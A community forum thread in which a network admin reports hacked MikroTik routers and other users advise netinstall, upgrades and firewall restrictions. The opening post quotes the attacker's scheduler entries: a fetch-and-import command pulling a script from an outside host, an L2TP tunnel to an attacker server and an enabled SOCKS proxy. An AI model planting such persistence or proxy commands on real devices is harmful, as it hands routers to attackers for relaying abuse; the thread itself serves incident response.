Community discussions

MikroTik App
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

someone hack my routrs - can someone help?

Sun Jun 06, 2021 3:21 pm

I have an old routrs netwrok with ~ 100 routers
that work for ~ 5 years (and even more) without any problems
today I have try to enter 5 of them and couldn't enter using winbox\api\ftp
only ssh

when I enter I saw this in the /system scheduler
/tool fetch url=http://zancetom.com/poll/afb843ea-4472-46b7-a1d0-acd9ecebaf1f mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
the file is one line :
/interface l2tp-client add name=lvpn keepalive-timeout=60 user=user5388942 password=pass5388942 connect-to=s88.leappoach.info disabled=no profile=default
I can see that it added me this rules
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input dst-port=5678 log-prefix="" protocol=tcp
/interface l2tp-client
add connect-to=s88.leappoach.info disabled=no name=lvpn password=pass5388942 \
    profile=default user=user538894


I have check and the IP the connection is coming from is 198.18.0.1

I have remove all the setting and check there are no new surprises (there are not so many setting in the router - so it's easy for me to see the if there are setting I don't know)

this is what I have added in the firewall filter \ IP service:
/ip firewall filter
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16
add action=drop chain=input log-prefix="" protocol=tcp

/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes
my questions:
1. what is the damage I'm facing?
2. what does "socks" do? where does it have access to ?
3. is the firewall\service rules I have added are good ?

Thanks,
 
User avatar
StubArea51
Trainer
Trainer
Posts: 1739
Joined: Fri Aug 10, 2012 6:46 am
Location: stubarea51.net
Contact:

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 3:39 pm

What version of RouterOS are you running? This sounds like the behavior from exploits that were patched a couple of years ago.

This MUM presentation has an extensive overview of the vulnerabilities and remediation

https://mum.mikrotik.com/presentations/ ... 679994.pdf
Last edited by StubArea51 on Sun Jun 06, 2021 4:22 pm, edited 1 time in total.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 3:43 pm

Your router are used as relay to hide identity of user for maybe illegal activity.
Netinstall seems to be the only valid solution to make sure every thing is gone.

You do not write what version of RouterOS you have? I guess you have an older version that is open fore WinBox hack.
Strange that you have 1327 posts and has been on this forum since 2011, that you have not seen this coming (with all the post of user been hacked)???

VPN is the best solution to remote administrate other Routers, if that can not be done, follow this steps.

1. Use another port than default.
2. Use port knocking. This prevents someone from seeing open ports.
3. Use a long and good password.
4. Use access list to prevent any random internet from accessing your router.
5. Log everything. (See my signature for example.)
6. Upgrade firmware to latest stable release
7. ++++

Just a quick search in google for zancetom.com mikrotik gives.

viewtopic.php?t=172091
viewtopic.php?t=145577
viewtopic.php?t=158047
https://www.reddit.com/r/mikrotik/comme ... ipt_in_my/
++++++
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 4:29 pm

as I said it's very old network ,
an now one that use it said something is wrong - so I have never checked it
it's version 6.23 and 6.36
using old mikrotik routres RB411
I have try to upgrage 3 of them to version 6.48 - the cpu is 100%
and mikrotik said it's can't be done.
this is why I still use this old version

3. password has change for all the rouoters after I have enter and remove the unwanted setting.
4. is this what I tried to do ? allow only 10.0.0.0/24 and 172.16.0.0/16 inserst my router (input) ? I don't need any other address access my router
5. funny that I asked you 2 weeks ago about splunk - without knoning I have a problem . so now I have to 'build' a server. :-)
6. can't do it - the hardware is not "strong" enough
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 18959
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 5:36 pm

If you are paid to support these routers you need to give the money back!!!!!!!!!
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 7:52 pm

You should upgrade to one version that fixes the Winbox. I thing it was 6.40.8.
But take care, MT did change the way switch / bridge works, so test it out before add to production.

6,23 are more than 6 years old and there has been many security fixes, so upgrade are needed.
If that is not possible, replace all routers that can not be upgraded.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 8:25 pm

And you wonder why there are so many botnets out there.
 
tdw
Forum Guru
Forum Guru
Posts: 1841
Joined: Sat May 05, 2018 11:55 am

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 9:24 pm

using old mikrotik routres RB411
I have try to upgrage 3 of them to version 6.48 - the cpu is 100%
and mikrotik said it's can't be done.
RB4xx are still listed under MIPSBE on the downloads page, if you upgraded a compromised router there may be some malware which doesn't work well in newer versions of RouterOS and consumes all the CPU resources. Have you tried a clean installation with netinstall and configure from an export (.rsc) rather than a backup (.backup)?

If they only have 32MB RAM you can disable any unused packages (e.g. hotspot, ipv6, mpls, routing) to make more memory available, still successfully using some RB750UP with v6.47.10.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: someone hack my routrs - can someone help?

Sun Jun 06, 2021 9:55 pm

The already "cracked" must be netinstalled,
the others protected from at least default firewall rules
viewtopic.php?f=13&t=175129&p=856824#p856824
and access service disabled on WAN and active only for internal IPs

DO NOT direct update to 6.47+, first update to 6.44.6
https://download.mikrotik.com/routeros/ ... 6.44.6.npk
Inside are some particolar procedure to remove junk from routerboard

Also going directly to 6.47+ you risk to lose user and password
because MikroTik on successive versions change the database format where username and password are store

also warning because the bridge format change from master/slave mechanism to auto-switch all-in-bridge
the 6.44.6 automatically convert old format with new, but keep hardware offload off and fast forward off
after upgrade to 6.44.6 you must past on terminal:
/int bri set [find] fast-forward=yes
/int bri port set [find] hw=yes

6.42.10 is the last version where superchannel can be selected (licence or not),
frequency-mode can be only "regulatory-domain"
if some of your device are wireless, after that version,
if you do not set before update some counter-measures,
your tx power on device are dropped accordingly nationals rules (and what you are set on antenna-gain)
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 7:52 am

I will check about the all the firewall rules , and see if I need to change something there for my case
in the meanwhile , is what I did is good?
the router is a hotspot unit - so will this rules will make users unable to connect the hotspot and the internet?
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=22 disabled=no
set api address=10.0.0.0/24,172.16.0.0/16 port=8728 disabled=no
set winbox address=10.0.0.0/24,172.16.0.0/16 port=8291 disabled=no
set api-ssl disabled=yes

/ip firewall filter
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24 
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16 
add action=drop chain=input log-prefix="" protocol=tcp 


also can someone exaplin about the
/ip socks
what does it do ? and how they use it? what the hack "earn" by using this? - I can't seem to understand this

Thanks,
 
User avatar
jvanhambelgium
Forum Veteran
Forum Veteran
Posts: 985
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 8:43 am

The socks service will act like a proxy-server. Basically your Mikrotik can be used to attack others. The attacker will "relay" through your Mikrotik and it appears to be coming from your Mikrotik.
You can change whatever you want, the but if the hacker has (still) has access they can undo your changes. The only option is CLEAN install, and update OS to recent one !!

Your services are now "shielded" indeed from other, so now only 10.x.x.x and 172.16.x.x.x can use them BUT with some of the vulnerabilities on RouterOS these settings might useless and can be bypassed anyway! For sure the WWW is disabled and that is good.
I'm not sure about other vulnerabilities on routerOS over the past years, no clue of Winbox was also affected.


About your filter ... it will only help you to protect from INTERNAL hackers (those having source-IP 10.0.0.0/24 & 172.16.0.0/16) => So probably users from your hotspots.

TO DO : These are TEMPORARY fixes, please NETINSTALL them as soon as possible, update RouterOS to recent version.
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 9:31 am

OK

about this :
About your filter ... it will only help you to protect from INTERNAL hackers (those having source-IP 10.0.0.0/24 & 172.16.0.0/16) => So probably users from your hotspots.
if someone from the internet will ty to enter the router - he will block , no ?
beacuse of this rule (it's under the allowed netwroks to the router)
add action=drop chain=input log-prefix="" protocol=tcp 
 
User avatar
jvanhambelgium
Forum Veteran
Forum Veteran
Posts: 985
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 9:37 am

OK

about this :
About your filter ... it will only help you to protect from INTERNAL hackers (those having source-IP 10.0.0.0/24 & 172.16.0.0/16) => So probably users from your hotspots.
if someone from the internet will ty to enter the router - he will block , no ?
beacuse of this rule (it's under the allowed netwroks to the router)
add action=drop chain=input log-prefix="" protocol=tcp 
Yes indeed. All TCP traffic destined to the Mikrotik device itself is blocked using this rule, regardless of what interface its coming through.
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 9:41 am

*** up until now I have used a private APN\ close netwroks(without internet connection) - so I didn't use almost the firewall rules
I want to understand and learn what to do correct from now


Thanks ,
 
User avatar
mkx
Forum Guru
Forum Guru
Posts: 11383
Joined: Thu Mar 03, 2016 10:23 pm

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 11:11 am

All but high-end devices (which includes CCR, CRS and RB1100 devices) come with set of default firewall rules. One can see default settings by executing command

/system default-configuration print

(just beware that lines are truncated rather than wrapped around, so make sure you have really wide terminal window when executing command. If line ends with "greater than" sign (>), then line is truncated).

Default setup can change from release to release, so as part of learning I'd purchase the cheapest device (hEX lite comes with recommended price of 39.95 USD) and use it as student's material. Can come handy also for lab tests. If you don't want to bother with problems due to low RAM and low permanent storage, you might want to get an unit with decent amount of both (but devices with flash size greater than 16MB are not cheap ... but hEX (RB750Gr3) has decent amount of RAM and comes with MSRP of 60 USD).

Changes in default setup don't get applied to already installed device during upgrade, so it's wise to check the differences between defaults and running config from time to time.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: someone hack my routrs - can someone help?

Mon Jun 07, 2021 1:24 pm

...
the others protected from at least default firewall rules
viewtopic.php?f=13&t=175129&p=856824#p856824
...
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: someone hack my routrs - can someone help?

Tue Sep 21, 2021 9:59 pm

The Italian Mafia... Pay who can make disaster for do not make disaster....

Who is online

Users browsing this forum: anav, Andrey05, ItchyAnkle, menyarito and 82 guests